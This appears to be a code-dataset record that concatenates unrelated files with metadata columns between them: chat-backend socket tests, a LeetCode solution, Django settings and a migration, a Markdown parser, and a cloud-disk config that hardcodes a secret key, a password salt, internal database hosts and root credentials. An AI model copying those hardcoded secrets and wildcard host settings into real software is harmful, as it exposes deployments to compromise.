self.assertEqual(reply, "info: listed accounts.")
# add new account
self.send_cmd("account add test <EMAIL> testpw")
reply = self.recv_msg()
self.assertEqual(reply, "info: added account 0.")
# retrieve account list again, should contain new account
self.send_cmd("account list")
reply = self.recv_msg()
self.assertEqual(reply, "account: 0 () test <EMAIL> [online]")
reply = self.recv_msg()
self.assertEqual(reply, "info: listed accounts.")
# add new account
self.send_cmd("account add test <EMAIL> test2pw")
reply = self.recv_msg()
self.assertEqual(reply, "info: added account 1.")
# retrieve account list again, should contain new account
self.send_cmd("account list")
replies = []
replies.append(self.recv_msg())
replies.append(self.recv_msg())
replies.sort()
self.assertEqual(replies[0],
"account: 0 () test <EMAIL> [online]")
self.assertEqual(replies[1],
"account: 1 () test <EMAIL> [online]")
reply = self.recv_msg()
self.assertEqual(reply, "info: listed accounts.")
# delete first account
self.send_cmd("account 0 delete")
reply = self.recv_msg()
self.assertEqual(reply, "info: account 0 deleted.")
# retrieve account list again, should only contain second account
self.send_cmd("account list")
reply = self.recv_msg()
self.assertEqual(reply, "account: 1 () test <EMAIL> [online]")
reply = self.recv_msg()
self.assertEqual(reply, "info: listed accounts.")
# add another account, should get first account id
self.send_cmd("account add test <EMAIL> test3pw")
reply = self.recv_msg()
self.assertEqual(reply, "info: added account 0.")
# retrieve account list again, should contain new account
self.send_cmd("account list")
replies = []
replies.append(self.recv_msg())
replies.append(self.recv_msg())
replies.sort()
self.assertEqual(replies[0],
"account: 0 () test <EMAIL> [online]")
self.assertEqual(replies[1],
"account: 1 () test <EMAIL> [online]")
reply = self.recv_msg()
self.assertEqual(reply, "info: listed accounts.")
def test_buddies(self) -> None:
"""
Test retrieving the buddy list and buddies adding with send
"""
# retrieve buddy list with no accounts
self.send_cmd("account 0 buddies")
reply = self.recv_msg()
self.assertEqual(reply, "error: invalid account")
# add an account
self.send_cmd("account add test <EMAIL> testpw")
reply = self.recv_msg()
self.assertEqual(reply, "info: added account 0.")
# retrieve buddy list with empty buddy list
self.send_cmd("account 0 buddies")
reply = self.recv_msg()
self.assertEqual(reply, "info: got buddies for account 0.")
# add buddy with send and retrieve buddy list
self.send_cmd("account 0 send <EMAIL> test")
reply = self.recv_msg()
self.assertEqual(reply[:8], "message:") # test backend returns msg
self.send_cmd("account 0 buddies")
reply = self.recv_msg()
self.assertEqual(reply,
"buddy: 0 status: name: <EMAIL> alias: ")
reply = self.recv_msg()
self.assertEqual(reply, "info: got buddies for account 0.")
# add more buddies and retrieve buddy list again
self.send_cmd("account 0 send <EMAIL> test")
reply = self.recv_msg()
self.assertEqual(reply[:8], "message:") # test backend returns msg
self.send_cmd("account 0 send <EMAIL> test")
reply = self.recv_msg()
self.assertEqual(reply[:8], "message:") # test backend returns msg
self.send_cmd("account 0 buddies")
replies = []
replies.append(self.recv_msg())
replies.append(self.recv_msg())
replies.append(self.recv_msg())
replies.sort()
self.assertEqual(replies[0],
"buddy: 0 status: name: <EMAIL> alias: ")
self.assertEqual(replies[1],
"buddy: 0 status: name: <EMAIL> alias: ")
self.assertEqual(replies[2],
"buddy: 0 status: name: <EMAIL> alias: ")
reply = self.recv_msg()
self.assertEqual(reply, "info: got buddies for account 0.")
# retrieve only online buddies
self.send_cmd("account 0 buddies online")
reply = self.recv_msg()
self.assertEqual(reply, "info: got buddies for account 0.")
def test_send(self) -> None:
"""
Test sending messages
"""
# try without an account
buddy = "<EMAIL>"
self.send_cmd(f"account 0 send {buddy} this is a test!")
reply = self.recv_msg()
self.assertEqual(reply, "error: invalid account")
# add an account
user = "<EMAIL>"
self.send_cmd(f"account add test {user} testpw")
reply = self.recv_msg()
self.assertEqual(reply, "info: added account 0.")
# try again, there should be no reply
msg = "this is a test!"
self.send_cmd(f"account 0 send {buddy} {msg}")
reply = self.recv_msg()
self.assertRegex(reply,
f"message: 0 {user} [0-9]+ {buddy} {msg.upper()}")
def test_collect(self) -> None:
"""
Test collecting old messages from history
"""
# try without an account
self.send_cmd("account 0 collect")
reply = self.recv_msg()
self.assertEqual(reply, "error: invalid account")
# add an account
self.send_cmd("account add test <EMAIL> testpw")
reply = self.recv_msg()
self.assertEqual(reply, "info: added account 0.")
# try again, there should be no reply because history is empty
self.send_cmd("account 0 collect")
reply = self.recv_msg()
self.assertEqual(reply, "info: collected messages for account 0.")
def test_status(self) -> None:
"""
Test getting and setting the status
"""
# try without an account
self.send_cmd("account 0 status get")
reply = self.recv_msg()
self.assertEqual(reply, "error: invalid account")
self.send_cmd("account 0 status set away")
reply = self.recv_msg()
self.assertEqual(reply, "error: invalid account")
# add an account
self.send_cmd("account add test <EMAIL> testpw")
reply = self.recv_msg()
self.assertEqual(reply, "info: added account 0.")
# get status again
self.send_cmd("account 0 status get")
reply = self.recv_msg()
self.assertEqual(reply, "status: account 0 status: online")
# set status to away
self.send_cmd("account 0 status set away")
reply = self.recv_msg()
self.assertEqual(reply, "status: account 0 status: away")
# get status again
self.send_cmd("account 0 status get")
reply = self.recv_msg()
self.assertEqual(reply, "status: account 0 status: away")
class BackendInetPushAccountsTest(BackendTest):
"""
Test the backend with an AF_INET socket and the "push accounts"
configuration setting
"""
def _set_backend_cmd(self) -> None:
"""
Set the backend command
"""
port = 33000 + self.test_run
self.backend_cmd = f"{self.path}/based.py --dir {self.test_dir} " \
f"--af inet --port {port} --push-accounts"
def _set_server_addr(self) -> None:
"""
Set the server address
"""
self.server_addr = ("localhost", 33000 + self.test_run)
def _reconnect(self) -> None:
"""
Network reconnect helper, tries to reconnect to the server
"""
self.sock.close()
self._set_socket()
self._connect()
def test_accounts(self) -> None:
"""
Test account listing and adding
"""
# test getting empty account list on connect
reply = self.recv_msg()
self.assertEqual(reply, "info: listed accounts.")
# add first account
self.send_cmd("account add test <EMAIL> testpw")
reply = self.recv_msg()
self.assertEqual(reply, "info: added account 0.")
reply = self.recv_msg()
self.assertEqual(reply, "account: 0 () test <EMAIL> [online]")
# add another account
self.send_cmd("account add test <EMAIL> test2pw")
reply = self.recv_msg()
self.assertEqual(reply, "info: added account 1.")
reply = self.recv_msg()
self.assertEqual(reply, "account: 1 () test <EMAIL> [online]")
# reconnect to the server and check new account list
self._reconnect()
reply = self.recv_msg()
self.assertEqual(reply, "account: 0 () test <EMAIL> [online]")
reply = self.recv_msg()
self.assertEqual(reply, "account: 1 () test <EMAIL> [online]")
reply = self.recv_msg()
self.assertEqual(reply, "info: listed accounts.")
class BackendUnixTest(BackendInetTest):
"""
Test the backend with an AF_UNIX socket
"""
def _set_backend_cmd(self) -> None:
"""
Get the backend command
"""
self.backend_cmd = f"{self.path}/based.py --dir {self.test_dir} "\
f"--af unix"
def _set_socket(self) -> None:
"""
Get the client socket
"""
self.sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
def _set_server_addr(self) -> None:
"""
Get the server address
"""
self.server_addr = str(Path(self.test_dir) / "based.sock")
if __name__ == '__main__':
unittest.main() | en | 0.734969 | Backend testing code # default socket timeout Common backend test base class # test run counter # increase test run counter # create temporary directory # start backend as subprocess # client connection Set the backend command Set the client socket Set the server address Network connection helper, tries to reach server for 5 seconds # close socket # close subprocess # delete temporary directory Send a command to the backend Receive a message from the backend Set socket timeout Test the backend with an AF_INET socket Test the version command Test the help command Test the bye command Test the bye command Test account listing as well as adding and deleting of accounts # empty account list, except nothing/timeout # add new account # retrieve account list again, should contain new account # add new account # retrieve account list again, should contain new account # delete first account # retrieve account list again, should only contain second account # add another account, should get first account id # retrieve account list again, should contain new account Test retrieving the buddy list and buddies adding with send # retrieve buddy list with no accounts # add an account # retrieve buddy list with empty buddy list # add buddy with send and retrieve buddy list # test backend returns msg # add more buddies and retrieve buddy list again # test backend returns msg # test backend returns msg # retrieve only online buddies Test sending messages # try without an account # add an account # try again, there should be no reply Test collecting old messages from history # try without an account # add an account # try again, there should be no reply because history is empty Test getting and setting the status # try without an account # add an account # get status again # set status to away # get status again Test the backend with an AF_INET socket and the "push accounts" configuration setting Set the backend command Set the server address Network reconnect helper, tries to reconnect to the server Test account listing and adding # test getting empty account list on connect # add first account # add another account # reconnect to the server and check new account list Test the backend with an AF_UNIX socket Get the backend command Get the client socket Get the server address | 2.376275 | 2 |
medium/Sum Root to Leaf Numbers/solution.py | ashutosh1919/leetcode-problems | 8 | 6616781 | <gh_stars>1-10
# Time complexity: O(n)
# Approach: Modified preorder traversal with checking leaf node and summing globally.
# Definition for a binary tree node.
# class TreeNode:
# def __init__(self, val=0, left=None, right=None):
# self.val = val
# self.left = left
# self.right = right
class Solution:
def __init__(self):
self.sum = 0
def findSum(self, root, ts):
if not root:
return
if not root.left and not root.right:
self.sum += int(ts+str(root.val))
return
self.findSum(root.left, ts+str(root.val))
self.findSum(root.right, ts+str(root.val))
def sumNumbers(self, root: Optional[TreeNode]) -> int:
self.findSum(root, "")
return self.sum | # Time complexity: O(n)
# Approach: Modified preorder traversal with checking leaf node and summing globally.
# Definition for a binary tree node.
# class TreeNode:
# def __init__(self, val=0, left=None, right=None):
# self.val = val
# self.left = left
# self.right = right
class Solution:
def __init__(self):
self.sum = 0
def findSum(self, root, ts):
if not root:
return
if not root.left and not root.right:
self.sum += int(ts+str(root.val))
return
self.findSum(root.left, ts+str(root.val))
self.findSum(root.right, ts+str(root.val))
def sumNumbers(self, root: Optional[TreeNode]) -> int:
self.findSum(root, "")
return self.sum | en | 0.710756 | # Time complexity: O(n) # Approach: Modified preorder traversal with checking leaf node and summing globally. # Definition for a binary tree node. # class TreeNode: # def __init__(self, val=0, left=None, right=None): # self.val = val # self.left = left # self.right = right | 3.769107 | 4 |
src/login/bklogin/config/common/django_basic.py | Canway-shiisa/bk-user | 0 | 6616782 | # -*- coding: utf-8 -*-
"""
Tencent is pleased to support the open source community by making 蓝鲸智云PaaS平台社区版 (BlueKing PaaS
Community Edition) available.
Copyright (C) 2017-2018 THL A29 Limited, a Tencent company. All rights reserved.
Licensed under the MIT License (the "License"); you may not use this file except in compliance with the License.
You may obtain a copy of the License at http://opensource.org/licenses/MIT
Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on
an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the
specific language governing permissions and limitations under the License.
"""
import os
from . import PROJECT_ROOT, env
ALLOWED_HOSTS = ["*"]
# Generic Django project settings
DEBUG = env.bool("DEBUG", False)
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = "<KEY>
CSRF_COOKIE_NAME = "bklogin_csrftoken"
# CSRF 验证失败处理函数
CSRF_FAILURE_VIEW = "bklogin.bkauth.views.csrf_failure"
ROOT_URLCONF = "bklogin.urls"
SITE_URL = "/"
# Django 3 required
DEFAULT_AUTO_FIELD = "django.db.models.AutoField"
# Application definition
INSTALLED_APPS = (
"django.contrib.admin",
"django.contrib.auth",
"django.contrib.contenttypes",
"django.contrib.sessions",
"django.contrib.messages",
"django.contrib.staticfiles",
"django_prometheus",
"bklogin.bkaccount",
"bklogin.bkauth",
"bklogin.bk_i18n",
"bklogin.monitoring",
)
MIDDLEWARE = (
"django_prometheus.middleware.PrometheusBeforeMiddleware",
"bkuser_global.middlewares.RequestProvider",
"django.contrib.sessions.middleware.SessionMiddleware",
"django.middleware.locale.LocaleMiddleware",
"django.middleware.common.CommonMiddleware",
"django.middleware.csrf.CsrfViewMiddleware",
"django.contrib.auth.middleware.AuthenticationMiddleware",
"django.contrib.sessions.middleware.SessionMiddleware",
"django.contrib.messages.middleware.MessageMiddleware",
"django.middleware.clickjacking.XFrameOptionsMiddleware",
"django.middleware.security.SecurityMiddleware",
"bklogin.bkauth.middlewares.LoginMiddleware",
"bklogin.bk_i18n.middlewares.LanguageMiddleware",
"bklogin.bk_i18n.middlewares.ApiLanguageMiddleware",
"bklogin.bk_i18n.middlewares.TimezoneMiddleware",
"django_prometheus.middleware.PrometheusAfterMiddleware",
)
TEMPLATES = [
{
"BACKEND": "django.template.backends.django.DjangoTemplates",
# django template dir
"DIRS": (
# 绝对路径,比如"/home/html/django_templates" or "C:/www/django/templates".
os.path.join(PROJECT_ROOT, "bklogin/templates"),
),
"APP_DIRS": True,
"OPTIONS": {
"context_processors": [
"django.template.context_processors.debug",
"django.template.context_processors.request",
"django.contrib.auth.context_processors.auth",
"django.template.context_processors.csrf",
"bklogin.common.context_processors.site_settings",
"django.template.context_processors.i18n",
"django.contrib.messages.context_processors.messages",
],
},
},
]
# ===============================================================================
# 静态资源设置
# ===============================================================================
STATICFILES_DIRS = (os.path.join(PROJECT_ROOT, "static/"),)
STATIC_VERSION = "0.2.3"
STATIC_URL = "/static/"
STATIC_ROOT = os.path.join(PROJECT_ROOT, "staticfiles/")
# CSS 文件后缀名
CSS_SUFFIX = "min.css"
# JS 文件后缀名
JS_SUFFIX = "min.js"
# ==============================================================================
# Django 项目配置
# ==============================================================================
USE_I18N = True
USE_L10N = True
# timezone
# Default time zone for localization in the UI.
# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name
TIME_ZONE = "Asia/Shanghai"
USE_TZ = True
TIMEZONE_SESSION_KEY = "django_timezone"
# language
LANGUAGES = (
("en", "English"),
("zh-hans", "简体中文"),
)
LANGUAGE_CODE = "zh-hans"
LANGUAGE_COOKIE_NAME = "blueking_language"
LANGUAGE_COOKIE_PATH = "/"
LOCALE_PATHS = (os.path.join(PROJECT_ROOT, "locale"),)
# ==============================================================================
# AUTHENTICATION
# ==============================================================================
AUTH_USER_MODEL = "bkauth.User"
| # -*- coding: utf-8 -*-
"""
Tencent is pleased to support the open source community by making 蓝鲸智云PaaS平台社区版 (BlueKing PaaS
Community Edition) available.
Copyright (C) 2017-2018 THL A29 Limited, a Tencent company. All rights reserved.
Licensed under the MIT License (the "License"); you may not use this file except in compliance with the License.
You may obtain a copy of the License at http://opensource.org/licenses/MIT
Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on
an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the
specific language governing permissions and limitations under the License.
"""
import os
from . import PROJECT_ROOT, env
ALLOWED_HOSTS = ["*"]
# Generic Django project settings
DEBUG = env.bool("DEBUG", False)
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = "<KEY>
CSRF_COOKIE_NAME = "bklogin_csrftoken"
# CSRF 验证失败处理函数
CSRF_FAILURE_VIEW = "bklogin.bkauth.views.csrf_failure"
ROOT_URLCONF = "bklogin.urls"
SITE_URL = "/"
# Django 3 required
DEFAULT_AUTO_FIELD = "django.db.models.AutoField"
# Application definition
INSTALLED_APPS = (
"django.contrib.admin",
"django.contrib.auth",
"django.contrib.contenttypes",
"django.contrib.sessions",
"django.contrib.messages",
"django.contrib.staticfiles",
"django_prometheus",
"bklogin.bkaccount",
"bklogin.bkauth",
"bklogin.bk_i18n",
"bklogin.monitoring",
)
MIDDLEWARE = (
"django_prometheus.middleware.PrometheusBeforeMiddleware",
"bkuser_global.middlewares.RequestProvider",
"django.contrib.sessions.middleware.SessionMiddleware",
"django.middleware.locale.LocaleMiddleware",
"django.middleware.common.CommonMiddleware",
"django.middleware.csrf.CsrfViewMiddleware",
"django.contrib.auth.middleware.AuthenticationMiddleware",
"django.contrib.sessions.middleware.SessionMiddleware",
"django.contrib.messages.middleware.MessageMiddleware",
"django.middleware.clickjacking.XFrameOptionsMiddleware",
"django.middleware.security.SecurityMiddleware",
"bklogin.bkauth.middlewares.LoginMiddleware",
"bklogin.bk_i18n.middlewares.LanguageMiddleware",
"bklogin.bk_i18n.middlewares.ApiLanguageMiddleware",
"bklogin.bk_i18n.middlewares.TimezoneMiddleware",
"django_prometheus.middleware.PrometheusAfterMiddleware",
)
TEMPLATES = [
{
"BACKEND": "django.template.backends.django.DjangoTemplates",
# django template dir
"DIRS": (
# 绝对路径,比如"/home/html/django_templates" or "C:/www/django/templates".
os.path.join(PROJECT_ROOT, "bklogin/templates"),
),
"APP_DIRS": True,
"OPTIONS": {
"context_processors": [
"django.template.context_processors.debug",
"django.template.context_processors.request",
"django.contrib.auth.context_processors.auth",
"django.template.context_processors.csrf",
"bklogin.common.context_processors.site_settings",
"django.template.context_processors.i18n",
"django.contrib.messages.context_processors.messages",
],
},
},
]
# ===============================================================================
# 静态资源设置
# ===============================================================================
STATICFILES_DIRS = (os.path.join(PROJECT_ROOT, "static/"),)
STATIC_VERSION = "0.2.3"
STATIC_URL = "/static/"
STATIC_ROOT = os.path.join(PROJECT_ROOT, "staticfiles/")
# CSS 文件后缀名
CSS_SUFFIX = "min.css"
# JS 文件后缀名
JS_SUFFIX = "min.js"
# ==============================================================================
# Django 项目配置
# ==============================================================================
USE_I18N = True
USE_L10N = True
# timezone
# Default time zone for localization in the UI.
# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name
TIME_ZONE = "Asia/Shanghai"
USE_TZ = True
TIMEZONE_SESSION_KEY = "django_timezone"
# language
LANGUAGES = (
("en", "English"),
("zh-hans", "简体中文"),
)
LANGUAGE_CODE = "zh-hans"
LANGUAGE_COOKIE_NAME = "blueking_language"
LANGUAGE_COOKIE_PATH = "/"
LOCALE_PATHS = (os.path.join(PROJECT_ROOT, "locale"),)
# ==============================================================================
# AUTHENTICATION
# ==============================================================================
AUTH_USER_MODEL = "bkauth.User"
| en | 0.628794 | # -*- coding: utf-8 -*- Tencent is pleased to support the open source community by making 蓝鲸智云PaaS平台社区版 (BlueKing PaaS Community Edition) available. Copyright (C) 2017-2018 THL A29 Limited, a Tencent company. All rights reserved. Licensed under the MIT License (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://opensource.org/licenses/MIT Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. # Generic Django project settings # SECURITY WARNING: keep the secret key used in production secret! # CSRF 验证失败处理函数 # Django 3 required # Application definition # django template dir # 绝对路径,比如"/home/html/django_templates" or "C:/www/django/templates". # =============================================================================== # 静态资源设置 # =============================================================================== # CSS 文件后缀名 # JS 文件后缀名 # ============================================================================== # Django 项目配置 # ============================================================================== # timezone # Default time zone for localization in the UI. # http://en.wikipedia.org/wiki/List_of_tz_zones_by_name # language # ============================================================================== # AUTHENTICATION # ============================================================================== | 1.760419 | 2 |
variableServer/migrations/0001_initial.py | bhecquet/seleniumRobot-server | 0 | 6616783 | <filename>variableServer/migrations/0001_initial.py
# -*- coding: utf-8 -*-
# Generated by Django 1.11 on 2017-09-20 14:11
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
('commonsServer', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Variable',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=100)),
('value', models.CharField(max_length=300)),
('releaseDate', models.DateTimeField(null=True)),
('internal', models.BooleanField(default=False)),
('protected', models.BooleanField(default=False)),
('description', models.CharField(default='', max_length=500, null=True)),
],
options={
'permissions': (('see_protected_var', 'Can see protected vars'),),
},
),
migrations.CreateModel(
name='Application',
fields=[
],
options={
'proxy': True,
'indexes': [],
},
bases=('commonsServer.application',),
),
migrations.CreateModel(
name='TestCase',
fields=[
],
options={
'proxy': True,
'indexes': [],
},
bases=('commonsServer.testcase',),
),
migrations.CreateModel(
name='TestEnvironment',
fields=[
],
options={
'proxy': True,
'indexes': [],
},
bases=('commonsServer.testenvironment',),
),
migrations.CreateModel(
name='Version',
fields=[
],
options={
'proxy': True,
'indexes': [],
},
bases=('commonsServer.version',),
),
migrations.AddField(
model_name='variable',
name='application',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='variableServer.Application'),
),
migrations.AddField(
model_name='variable',
name='environment',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='variableServer.TestEnvironment'),
),
migrations.AddField(
model_name='variable',
name='test',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='variableServer.TestCase'),
),
migrations.AddField(
model_name='variable',
name='version',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='variableServer.Version'),
),
]
| <filename>variableServer/migrations/0001_initial.py
# -*- coding: utf-8 -*-
# Generated by Django 1.11 on 2017-09-20 14:11
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
('commonsServer', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Variable',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=100)),
('value', models.CharField(max_length=300)),
('releaseDate', models.DateTimeField(null=True)),
('internal', models.BooleanField(default=False)),
('protected', models.BooleanField(default=False)),
('description', models.CharField(default='', max_length=500, null=True)),
],
options={
'permissions': (('see_protected_var', 'Can see protected vars'),),
},
),
migrations.CreateModel(
name='Application',
fields=[
],
options={
'proxy': True,
'indexes': [],
},
bases=('commonsServer.application',),
),
migrations.CreateModel(
name='TestCase',
fields=[
],
options={
'proxy': True,
'indexes': [],
},
bases=('commonsServer.testcase',),
),
migrations.CreateModel(
name='TestEnvironment',
fields=[
],
options={
'proxy': True,
'indexes': [],
},
bases=('commonsServer.testenvironment',),
),
migrations.CreateModel(
name='Version',
fields=[
],
options={
'proxy': True,
'indexes': [],
},
bases=('commonsServer.version',),
),
migrations.AddField(
model_name='variable',
name='application',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='variableServer.Application'),
),
migrations.AddField(
model_name='variable',
name='environment',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='variableServer.TestEnvironment'),
),
migrations.AddField(
model_name='variable',
name='test',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='variableServer.TestCase'),
),
migrations.AddField(
model_name='variable',
name='version',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='variableServer.Version'),
),
]
| en | 0.823681 | # -*- coding: utf-8 -*- # Generated by Django 1.11 on 2017-09-20 14:11 | 1.684117 | 2 |
GithubMarkdown.py | issuequality/issuequality | 0 | 6616784 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import re
from hashlib import md5
class GithubMarkdown(object):
"""Classe para representar um texto formato com
a sintaxe do Markdown adotada pelo github.
"""
def __init__(self, text):
"""TODO: to be defined1. """
self.__content = self.parse(text)
def get_content(self):
"""TODO: Docstring for get_content.
:returns: TODO
"""
if self.__content is None:
return None
else:
return self.__content
def parse(self, text):
# Extract pre blocks.
extractions = {}
def pre_extraction_callback(matchobj):
digest = md5(matchobj.group(0)).hexdigest()
extractions[digest] = matchobj.group(0)
return "{gfm-extraction-%s}" % digest
pattern = re.compile(r'<pre>.*?</pre>', re.MULTILINE | re.DOTALL)
text = re.sub(pattern, pre_extraction_callback, text)
# Prevent foo_bar_baz from ending up with an italic word in the middle.
def italic_callback(matchobj):
s = matchobj.group(0)
if list(s).count('_') >= 2:
return s.replace('_', '\_')
return s
text = re.sub(r'^(?! {4}|\t)\w+_\w+_\w[\w_]*', italic_callback, text)
# In very clear cases, let newlines become <br /> tags.
def newline_callback(matchobj):
if len(matchobj.group(1)) == 1:
return matchobj.group(0).rstrip() + ' \n'
else:
return matchobj.group(0)
pattern = re.compile(r'^[\w\<][^\n]*(\n+)', re.MULTILINE)
text = re.sub(pattern, newline_callback, text)
# Insert pre block extractions.
def pre_insert_callback(matchobj):
return '\n\n' + extractions[matchobj.group(1)]
text = re.sub(r'{gfm-extraction-([0-9a-f]{32})\}',
pre_insert_callback,
text
)
return text
| #!/usr/bin/env python
# -*- coding: utf-8 -*-
import re
from hashlib import md5
class GithubMarkdown(object):
"""Classe para representar um texto formato com
a sintaxe do Markdown adotada pelo github.
"""
def __init__(self, text):
"""TODO: to be defined1. """
self.__content = self.parse(text)
def get_content(self):
"""TODO: Docstring for get_content.
:returns: TODO
"""
if self.__content is None:
return None
else:
return self.__content
def parse(self, text):
# Extract pre blocks.
extractions = {}
def pre_extraction_callback(matchobj):
digest = md5(matchobj.group(0)).hexdigest()
extractions[digest] = matchobj.group(0)
return "{gfm-extraction-%s}" % digest
pattern = re.compile(r'<pre>.*?</pre>', re.MULTILINE | re.DOTALL)
text = re.sub(pattern, pre_extraction_callback, text)
# Prevent foo_bar_baz from ending up with an italic word in the middle.
def italic_callback(matchobj):
s = matchobj.group(0)
if list(s).count('_') >= 2:
return s.replace('_', '\_')
return s
text = re.sub(r'^(?! {4}|\t)\w+_\w+_\w[\w_]*', italic_callback, text)
# In very clear cases, let newlines become <br /> tags.
def newline_callback(matchobj):
if len(matchobj.group(1)) == 1:
return matchobj.group(0).rstrip() + ' \n'
else:
return matchobj.group(0)
pattern = re.compile(r'^[\w\<][^\n]*(\n+)', re.MULTILINE)
text = re.sub(pattern, newline_callback, text)
# Insert pre block extractions.
def pre_insert_callback(matchobj):
return '\n\n' + extractions[matchobj.group(1)]
text = re.sub(r'{gfm-extraction-([0-9a-f]{32})\}',
pre_insert_callback,
text
)
return text
| en | 0.448946 | #!/usr/bin/env python # -*- coding: utf-8 -*- Classe para representar um texto formato com a sintaxe do Markdown adotada pelo github. TODO: to be defined1. TODO: Docstring for get_content. :returns: TODO # Extract pre blocks. # Prevent foo_bar_baz from ending up with an italic word in the middle. # In very clear cases, let newlines become <br /> tags. # Insert pre block extractions. | 3.120808 | 3 |
caluma/core/jexl.py | sliverc/caluma | 0 | 6616785 | <gh_stars>0
from pyjexl.analysis import ValidatingAnalyzer
class ExtractTransformSubjectAnalyzer(ValidatingAnalyzer):
"""
Extract all subject values of given transforms.
If no transforms are given all subjects of all transforms will be extracted.
"""
def __init__(self, config, transforms=[]):
self.transforms = transforms
super().__init__(config)
def visit_Transform(self, transform):
if not self.transforms or transform.name in self.transforms:
yield transform.subject.value
yield from self.generic_visit(transform)
| from pyjexl.analysis import ValidatingAnalyzer
class ExtractTransformSubjectAnalyzer(ValidatingAnalyzer):
"""
Extract all subject values of given transforms.
If no transforms are given all subjects of all transforms will be extracted.
"""
def __init__(self, config, transforms=[]):
self.transforms = transforms
super().__init__(config)
def visit_Transform(self, transform):
if not self.transforms or transform.name in self.transforms:
yield transform.subject.value
yield from self.generic_visit(transform) | en | 0.75278 | Extract all subject values of given transforms. If no transforms are given all subjects of all transforms will be extracted. | 2.452236 | 2 |
backend/config.py | Philogag/Flask-Cloud-Disk | 1 | 6616786 | <gh_stars>1-10
from datetime import timedelta
import os
#
SECRET_KEY = 'asgwesvrery]p'
HASH_SALT="qwwgawegxdf+w36_" # 16位加密用于密码哈希
AES_KEY_LENGTH = 64
MAX_CHUNK_SIZE = 4 * 1024 * 1024 # B = 4MB
# 文件(夹)名黑名单字符
BANNED_CHARSET = """/\:*?"<>|"""
# 回收站保存时长
# RECYCLE_BIN_TTL = 7 * 24 * 3600 # seconds
RECYCLE_BIN_TTL = 120
# 登陆设置
PERMANENT_SESSION_LIFETIME = timedelta(days=1) # 登录过期时间
REMEMBER_COOKIE_REFRESH_EACH_REQUEST = True # 自动刷新时长
# 数据库配置
MONGODB_SETTINGS = {
"db": 'cloud_disk',
'host': '192.168.10.5',
'port': 27017,
'connect': False,
'username': 'root',
'password': '<PASSWORD>',
"authentication_source":'admin',
}
# HDFS 设置
HADOOP_MASTER = [
"192.168.10.5:50070",
]
HADOOP_USER_NAME='root'
HDFS_HOME = '/cloud' # hdfs中的根目录
# HBASE 设置
# HBASE_MASTER = "192.168.10.5:60000"
| from datetime import timedelta
import os
#
SECRET_KEY = 'asgwesvrery]p'
HASH_SALT="qwwgawegxdf+w36_" # 16位加密用于密码哈希
AES_KEY_LENGTH = 64
MAX_CHUNK_SIZE = 4 * 1024 * 1024 # B = 4MB
# 文件(夹)名黑名单字符
BANNED_CHARSET = """/\:*?"<>|"""
# 回收站保存时长
# RECYCLE_BIN_TTL = 7 * 24 * 3600 # seconds
RECYCLE_BIN_TTL = 120
# 登陆设置
PERMANENT_SESSION_LIFETIME = timedelta(days=1) # 登录过期时间
REMEMBER_COOKIE_REFRESH_EACH_REQUEST = True # 自动刷新时长
# 数据库配置
MONGODB_SETTINGS = {
"db": 'cloud_disk',
'host': '192.168.10.5',
'port': 27017,
'connect': False,
'username': 'root',
'password': '<PASSWORD>',
"authentication_source":'admin',
}
# HDFS 设置
HADOOP_MASTER = [
"192.168.10.5:50070",
]
HADOOP_USER_NAME='root'
HDFS_HOME = '/cloud' # hdfs中的根目录
# HBASE 设置
# HBASE_MASTER = "192.168.10.5:60000" | zh | 0.790428 | # # 16位加密用于密码哈希 # B = 4MB # 文件(夹)名黑名单字符 /\:*?"<>| # 回收站保存时长 # RECYCLE_BIN_TTL = 7 * 24 * 3600 # seconds # 登陆设置 # 登录过期时间 # 自动刷新时长 # 数据库配置 # HDFS 设置 # hdfs中的根目录 # HBASE 设置 # HBASE_MASTER = "192.168.10.5:60000" | 1.814575 | 2 |
20/task_1.py | Nenivar/advent-of-code-2018 | 0 | 6616787 | import re, sys
#sample = '^ENWWW(NEEE|SSE(EE|N))SSWE(S|)$'
sample = '^ENNWSWW(NEWS|)SSSEEN(WNSE|)EE(SWEN|)NNN$'
#sample = '^ESSWWN(E|NNENN(EESS(WNSE|)SSS|WWWSSSSE(SW|NNNE)))$'
regex = re.compile(r'(\w+)')
bracketed = re.compile(r'\((\w*\|?)*\)')
final = re.compile(r'^((\)|\|)*\$)')
#bracketed = re.compile(r'\(([^()]|(\R?))*\)')
#match = re.search(regex, sample)
#remaining = sample[match.end():]
#print('"{}", "{}"'.format(match.group(1), remaining))
#match = re.search(bracketed, remaining)
#print(match.group(1))
#remaining = sample[match.end():]
# only for outer-most
def findWord(line: str) -> (str, str):
